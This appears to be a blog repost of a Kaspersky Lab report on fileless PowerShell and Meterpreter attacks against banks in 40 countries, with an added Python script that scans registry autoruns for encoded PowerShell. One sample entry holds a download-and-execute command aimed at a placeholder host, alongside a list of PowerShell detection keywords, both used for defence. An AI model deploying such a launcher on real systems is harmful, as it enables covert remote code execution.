GCMAN and Carbanak Hacking in 40 countries with hidden malware

Banks, telecommunication companies and government agencies in the US, South America, Europe and Africa are among the top targets, with the notorious GCMAN and Carbanak groups among the key suspects.

Kaspersky Lab experts have discovered a series of "invisible" targeted attacks that use only legitimate software: widely available penetration-testing and administration tools, as well as the PowerShell framework for task automation in Windows, with no malware files on the hard disk, only code hidden in memory. This combined approach helps the attackers evade detection by whitelisting technologies and leaves researchers with almost no objects or malware samples to work with.

The attackers remain in the system for a long time to gather information, and their traces disappear from it after the first restart.

At the end of 2016, banks in the CIS contacted Kaspersky Lab specialists, who found Meterpreter (penetration-testing software now commonly used for malicious purposes) in the memory of the banks' servers, where it had no business being. Kaspersky Lab discovered that the Meterpreter code had been combined with a number of legitimate PowerShell scripts and other utilities. The combined tools had been adapted into malicious code that could hide in memory and invisibly collect system administrator passwords, so that the attackers could control the victim's systems remotely. The ultimate goal appears to have been access to financial processes.

Kaspersky Lab has since revealed that these attacks are happening on a massive scale: more than 140 enterprise networks in a range of business sectors have been hit, with most of the victims located in the USA, France, Ecuador, Kenya, the United Kingdom and …

Figure: the geography of organizations attacked by the method discovered.

In total, "infections" have been recorded in 40 countries.

It is not yet known who is behind the attacks. The use of open-source exploit code, common Windows utilities and unknown domains makes it nearly impossible to determine which group was responsible, or even whether it is a single group or several groups sharing the same tools. The known groups whose approaches are most similar are GCMAN and Carbanak.

Such tools also make it harder to uncover the details of an attack. The usual incident-response procedure is for an investigator to follow the traces and samples the attackers left on the network. And while data on a hard disk can remain available for a year after the fact, objects hidden in memory are gone when the computer is first restarted. Fortunately, in this case the experts got to them in time.

"The determination of attackers to hide their activity and make detection and response increasingly difficult explains the latest trend of anti-forensic techniques and malware that rely on device memory. This is why memory forensics is becoming critical to the analysis of malware and its functions. In these particular incidents, the attackers used every conceivable anti-forensic technique, demonstrating that no malware files are needed for the successful exfiltration of data from a network, and that the use of legitimate and open-source utilities makes attribution almost impossible," said Sergey Golovanov, Principal Security Researcher at Kaspersky Lab.

The attackers are still active, so it is important to note that such an attack can only be detected in RAM, on the network and in the registry, and that in such cases Yara rules based on scanning malicious files are of no use.
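The registry is the one of the three places named above that survives a reboot, so it is where a defender can still look for the launcher of an otherwise memory-only PowerShell payload. The script below is an added example for this article, not code from Kaspersky Lab or from the report; the autorun entries it scans are constructed sample data, the indicator list is a small, assumed set of strings commonly looked for in PowerShell command lines, and the URL uses the reserved example.invalid domain. It decodes a Base64 "-EncodedCommand" argument (PowerShell expects UTF-16LE text there) and flags entries that carry either an encoded command or a suspicious keyword, while leaving an ordinary PowerShell autorun alone.

```python
import base64
import re

# PowerShell's -EncodedCommand takes Base64 of UTF-16LE text; this helper is
# only used to build the constructed sample below.
def _encode_ps(script: str) -> str:
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed sample autorun values as (registry value path, data) pairs.
# These are illustrative, not indicators from the Kaspersky report.
SAMPLE_AUTORUNS = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     r"%windir%\system32\SecurityHealthSystray.exe"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
     + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup",
     'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Backup | Out-Null"'),
]

# -e, -ec, -en, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                          re.IGNORECASE)

# Assumed indicator set: names mapped to case-insensitive regexes.
SUSPICIOUS = {
    "IEX": r"\bIEX\b",
    "Invoke-Expression": r"Invoke-Expression",
    "DownloadString": r"DownloadString",
    "DownloadFile": r"DownloadFile",
    "FromBase64String": r"FromBase64String",
    "Reflection.Assembly": r"Reflection\.Assembly",
    "VirtualAlloc": r"VirtualAlloc",
    "WindowStyle Hidden": r"-WindowStyle\s+Hidden",
}
_COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in SUSPICIOUS.items()}


def decode_encoded_command(data: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENCODED_FLAG.search(data)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_autorun(value_path: str, data: str):
    """Inspect one autorun value; return a finding dict or None for non-PowerShell data."""
    if "powershell" not in data.lower():
        return None
    decoded = decode_encoded_command(data)
    # Match indicators against both the raw command line and the decoded script.
    text = data if decoded is None else data + "\n" + decoded
    hits = sorted(name for name, rx in _COMPILED.items() if rx.search(text))
    return {"value": value_path, "encoded": decoded is not None,
            "decoded": decoded, "indicators": hits}


def scan_autoruns(entries):
    """Return findings for entries that are encoded or hit at least one indicator."""
    findings = []
    for path, data in entries:
        result = analyse_autorun(path, data)
        if result and (result["encoded"] or result["indicators"]):
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan_autoruns(SAMPLE_AUTORUNS):
        print(f["value"])
        print("  encoded:", f["encoded"], "indicators:", ", ".join(f["indicators"]))
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

On a real host the entries would come from an autoruns export or a registry query rather than a list, and the same decoding step applies to PowerShell command lines recovered from process memory or from script-block logs, which is why a file-hash Yara scan of the disk finds nothing here: powershell.exe itself is a signed, legitimate binary.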

Details of the second part of this story, which shows how the attackers use unique tactics to withdraw money through ATMs, will be presented by Sergey Golovanov and Igor Soumenkov at the Security Analyst Summit, which takes place from April 2 to 6, 2017.

Kaspersky Lab products detect operations that use the above tactics, techniques and procedures. More information about this story and the Yara rules for forensic analysis can be found on the dedicated blog on Securelist.com. Technical details, including Indicators of Compromise, are also provided to customers of Kaspersky Intelligence Services.


Written by Dimitris
